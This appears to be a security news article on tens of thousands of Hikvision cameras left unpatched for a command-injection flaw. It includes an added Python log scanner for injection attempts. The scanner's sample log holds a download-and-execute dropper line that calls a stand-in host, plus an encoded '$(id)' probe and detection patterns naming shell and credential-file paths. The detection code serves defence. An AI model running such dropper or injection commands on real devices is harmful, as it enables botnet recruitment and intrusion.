Vulnerable Hikvision cameras exposed online

Cyfirma finds 80,000 unpatched Chinese-made cameras in online scan

Brian Pereira (digital_belief) • August 23, 2022

Hikvision headquarters in Hangzhou, Zhejiang, China. (Image: Raysonho @ Open Grid Scheduler / Grid Engine)

Cybercriminals in Russian forums are selling login credentials to Hikvision-branded security cameras, tens of thousands of which remain vulnerable to a well-known exploit, a threat intelligence firm warns.

A study by Cyfirma reveals that more than 80,000 Hikvision cameras in use worldwide still contain a critical flaw first identified more than a year ago.


Chinese manufacturer Hangzhou Hikvision Digital Technology Co. released a patch for the vulnerability last September. Tracked as CVE-2021-36260, it is a command injection flaw in the cameras' web server: an attacker who can reach a device's web interface can inject and run arbitrary system commands on the camera's operating system, without valid credentials. Attackers could use it to conscript the cameras into a botnet or to turn a compromised camera into a foothold for lateral movement deeper into the operator's network. Late last year, cybersecurity firm Fortinet said it had spotted "numerous payloads attempting to exploit this vulnerability," including one that appeared to recruit vulnerable cameras into the Moobot botnet, a variant of the Mirai botnet.
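As an added illustration, and not code from the article, Hikvision, Cyfirma or Fortinet, the Python below scans reverse-proxy log records for the traces a command-injection attempt against an embedded web server tends to leave: shell substitution syntax, command chaining, and the download-then-execute sequence Mirai-family droppers use to pull an architecture-specific binary onto the device. It keys on generic shell syntax rather than on any one product's request format, so the exploit request itself is not reproduced. The log lines, the JSON field names, the paths and the 203.0.113.x address are all constructed for the example.

```python
"""Flag HTTP requests that carry OS command-injection indicators.

Added example: scans constructed JSON-lines proxy logs for shell syntax
that legitimate camera-management traffic almost never contains.
Field names ("path", "query", "body") are an assumption about the log format.
"""
import json
import re
from urllib.parse import unquote

# Indicator name -> regex. Order matters only for the order of reported hits.
INDICATORS = {
    # $(...) or backticks: the attacker is asking the shell to substitute a command
    "subshell": re.compile(r"\$\(|`"),
    # ; || && | followed by something that looks like a command or a path
    "command_chain": re.compile(r"(?:;|\|\||&&|\|)\s*[a-zA-Z/]"),
    # fetch a payload, then mark it executable / run it: classic IoT dropper shape
    "download_and_run": re.compile(r"\b(?:wget|curl|tftp)\b.*?(?:chmod|\bsh\b|/tmp/)", re.S),
    # direct references to the device's shell or sensitive files
    "device_paths": re.compile(r"/dev/(?:null|tcp|udp)|/etc/passwd|/bin/(?:busybox|sh)"),
}


def fully_decode(text, max_rounds=3):
    """Undo percent-encoding until the string stops changing.

    Attackers double-encode ("%2524" -> "%24" -> "$") to slip past filters
    that decode only once; decoding until stable (with a cap) defeats that.
    """
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan_record(record):
    """Return the names of every indicator matched by one parsed log record."""
    haystack = fully_decode(
        " ".join(str(record.get(key, "")) for key in ("path", "query", "body"))
    )
    return [name for name, rx in INDICATORS.items() if rx.search(haystack)]


def scan_log(lines):
    """Parse JSON lines; return (record, hits) for each suspicious request."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            # Malformed line: skipped here; a real pipeline should count these,
            # since a flood of unparseable lines is itself worth an alert.
            continue
        hits = scan_record(record)
        if hits:
            findings.append((record, hits))
    return findings


# Constructed sample log (not real traffic). Line 1 mimics a dropper:
# substitute a command that fetches a binary, marks it executable and runs it.
SAMPLE_LOG = [
    '{"method":"PUT","path":"/example/upload","query":"","body":'
    '"<cfg>$(wget http://203.0.113.5/arm7 -O /tmp/arm7; chmod +x /tmp/arm7; /tmp/arm7)</cfg>"}',
    '{"method":"GET","path":"/api/status","query":"channel=1&format=json","body":""}',
    '{"method":"POST","path":"/api/config","query":"","body":"name=%2524%2528id%2529"}',
    'this line is not json',
    '{"method":"POST","path":"/api/login","query":"","body":"user=admin&pass=abc|123"}',
]

if __name__ == "__main__":
    for record, hits in scan_log(SAMPLE_LOG):
        print(record["method"], record["path"], "->", ", ".join(hits))
```

Two of the five constructed lines are flagged: the dropper (subshell, command chain, download-and-run) and the double-encoded `$(id)` probe, which only surfaces because decoding is repeated. The `command_chain` rule will fire on legitimate bodies that contain `;` or `|` followed by a letter, so in production it belongs at a lower severity than `subshell` and `download_and_run`, or restricted to endpoints that should never receive such characters.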

Cyfirma researchers analyzed a sample of approximately 285,000 Hikvision web servers worldwide. The analysis found that more than 2,300 organizations in over 100 countries operate cameras whose web ports are reachable from the internet. China and the United States together accounted for nearly a third of the vulnerable cameras, with 12,690 and 10,611 vulnerable devices respectively.

Saurabh Lal, president of research and customer engagement at Cyfirma, told Information Security Media Group that these organizations are likely unaware that their devices are exposed to internet traffic at all.

“These ports aren’t monitored, validated, or tested, and they just add entry points to your porous attack surface,” says Lal. He says it’s an “implementation flaw” and that the companies have been “careless with the setup.”

In January 2022, the US Cybersecurity and Infrastructure Security Agency warned that the vulnerability was being actively exploited and urged organizations to patch immediately.

Cyfirma believes that Chinese threat groups such as MISSION2025/APT41 and APT10 and their affiliates, as well as unidentified Russian threat actor groups, could exploit the unpatched security cameras.

“We observed leaking credentials of Hikvision camera products available for sale on Russian forums,” Cyfirma researchers say.

Hikvision is state-controlled and appears on several US federal government blacklists. The Federal Communications Commission in March 2021 designated the company a national security risk. U.S. citizens are barred from owning shares of the company under an executive order first signed by Donald Trump and revised by President Joe Biden in June 2021. The Department of Commerce placed the company under export controls in 2019 for participating in state surveillance of the Uyghur ethnic group in the Xinjiang Uyghur Autonomous Region.
